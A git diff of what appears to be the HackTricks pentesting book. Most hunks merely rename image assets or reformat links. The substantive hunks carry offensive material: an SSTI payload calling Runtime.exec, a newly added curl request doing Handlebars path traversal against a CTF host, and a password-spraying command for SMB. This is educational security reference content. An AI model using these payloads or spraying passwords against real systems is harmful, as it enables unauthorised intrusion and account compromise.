diff --git a/README.md b/README.md index e570cf2ec93..b6fb2f96934 100644 --- a/README.md +++ b/README.md @@ -16,7 +16,7 @@ If you want to **know** about my **latest modifications**/**additions** or you h **If you want to** share some tricks with the community **you can also submit** pull requests **to** [https://github.com/carlospolop/hacktricks](https://github.com/carlospolop/hacktricks**]%28https://github.com/carlospolop/hacktricks) that will be reflected in this book. Don't forget to\*\* give ⭐ on the github to motivate me to continue developing this book. -![](.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67%20%286%29%20%284%29%20%284%29.png) +![](.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67%20%286%29%20%284%29%20%283%29.png) [**Buy me a coffee here**](https://www.buymeacoffee.com/carlospolop) diff --git a/linux-unix/linux-privilege-escalation-checklist.md b/linux-unix/linux-privilege-escalation-checklist.md index 9b9a7a36129..5867d7ee5ee 100644 --- a/linux-unix/linux-privilege-escalation-checklist.md +++ b/linux-unix/linux-privilege-escalation-checklist.md @@ -146,7 +146,7 @@ If you want to **know** about my **latest modifications**/**additions** or you h If you want to **share some tricks with the community** you can also submit **pull requests** to ****[**https://github.com/carlospolop/hacktricks**](https://github.com/carlospolop/hacktricks) ****that will be reflected in this book. Don't forget to **give ⭐ on the github** to motivate me to continue developing this book. -![](../.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67%20%286%29%20%284%29%20%286%29.png) +![](../.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67%20%286%29%20%284%29%20%285%29.png) ​[**Buy me a coffee here**](https://www.buymeacoffee.com/carlospolop)\*\*\*\* diff --git a/pentesting-web/ssti-server-side-template-injection.md b/pentesting-web/ssti-server-side-template-injection.md index 28cb5a915e5..31cf164ee8d 100644 --- a/pentesting-web/ssti-server-side-template-injection.md +++ b/pentesting-web/ssti-server-side-template-injection.md @@ -185,6 +185,12 @@ http://localhost:8082/(${T(java.lang.Runtime).getRuntime().exec('calc')}) ### Handlebars \(NodeJS\) +Path Traversal \(more info [here](https://blog.shoebpatel.com/2021/01/23/The-Secret-Parameter-LFR-and-Potential-RCE-in-NodeJS-Apps/)\). + +```bash +curl -X 'POST' -H 'Content-Type: application/json' --data-binary $'{\"profile\":{"layout\": \"./../routes/index.js\"}}' 'http://ctf.shoebpatel.com:9090/' +``` + * = Error * ${7\*7} = ${7\*7} * Nothing diff --git a/windows/active-directory-methodology/README.md b/windows/active-directory-methodology/README.md index 8e8f095bb7a..db072d083f4 100644 --- a/windows/active-directory-methodology/README.md +++ b/windows/active-directory-methodology/README.md @@ -398,7 +398,7 @@ If you don't execute this from a Domain Controller, ATA is going to catch you, s * [Python script to enumerate active directory](https://github.com/ropnop/windapsearch) * [Python script to enumerate active directory](https://github.com/CroweCybersecurity/ad-ldap-enum) -![](../../.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67%20%286%29%20%284%29%20%282%29.png) +![](../../.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67%20%286%29%20%284%29%20%286%29.png) ​[**Buy me a coffee here**](https://www.buymeacoffee.com/carlospolop)\*\*\*\* diff --git a/windows/active-directory-methodology/password-spraying.md b/windows/active-directory-methodology/password-spraying.md index e30b3b0b6f7..5016d9b9329 100644 --- a/windows/active-directory-methodology/password-spraying.md +++ b/windows/active-directory-methodology/password-spraying.md @@ -67,7 +67,7 @@ or **spray** \(read next section\). The best way is not to try with more than 5/7 passwords per account. -So you have to be very careful with password spraying because you could lockout accounts. To brute force taking this into mind, you can use _**[spray](https://github.com/Greenwolf/Spray):**_ +So you have to be very careful with password spraying because you could lockout accounts. To brute force taking this into mind, you can use [_**spray**_](https://github.com/Greenwolf/Spray)_**:**_ ```bash spray.sh -smb diff --git a/windows/checklist-windows-privilege-escalation.md b/windows/checklist-windows-privilege-escalation.md index ea454a97069..0cf1ef5faf8 100644 --- a/windows/checklist-windows-privilege-escalation.md +++ b/windows/checklist-windows-privilege-escalation.md @@ -118,7 +118,7 @@ If you want to **know** about my **latest modifications**/**additions** or you h If you want to **share some tricks with the community** you can also submit **pull requests** to ****[**https://github.com/carlospolop/hacktricks**](https://github.com/carlospolop/hacktricks) ****that will be reflected in this book. Don't forget to **give ⭐ on the github** to motivate me to continue developing this book. -![](../.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67%20%286%29%20%284%29%20%285%29.png) +![](../.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67%20%286%29%20%284%29%20%284%29.png) ​[**Buy me a coffee here**](https://www.buymeacoffee.com/carlospolop)\*\*\*\*